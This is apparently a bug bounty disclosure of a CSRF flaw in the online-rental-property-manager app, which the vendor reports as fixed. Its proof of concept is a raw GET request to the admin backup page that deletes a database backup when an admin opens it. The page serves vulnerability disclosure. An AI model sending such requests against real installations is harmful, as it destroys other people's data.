Cross-Site Request Forgery (CSRF) in bigprof-software/online-rental-property-manager

Valid

Reported on

Aug 4th 2021

✍️ Description

csrf bug to delete a backup

🕵️‍♂️ Proof of Concept

Bellow request vulnerable to csrf bug which allow to delete database backup

GET /online-rental-property-manager/app/admin/pageBackupRestore.php?action=delete&md5_hash=eea01b37c4b7422a4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/online-rental-property-manager/app/admin/pageBackupRestore.php

just open this url and see backup file is deleted. Here you need to change backup id

💥 Impact

csrf bug

We have contacted a member of the bigprof-software/online-rental-property-manager team and are waiting to hear back 2 years ago

BigProf Software marked this as fixed with commit 1f0242 2 years ago

BigProf Software has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

We have contacted a member of the bigprof-software/online-rental-property-manager team and are waiting to hear back 2 years ago

BigProf Software marked this as fixed with commit 1f0242 2 years ago

BigProf Software has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation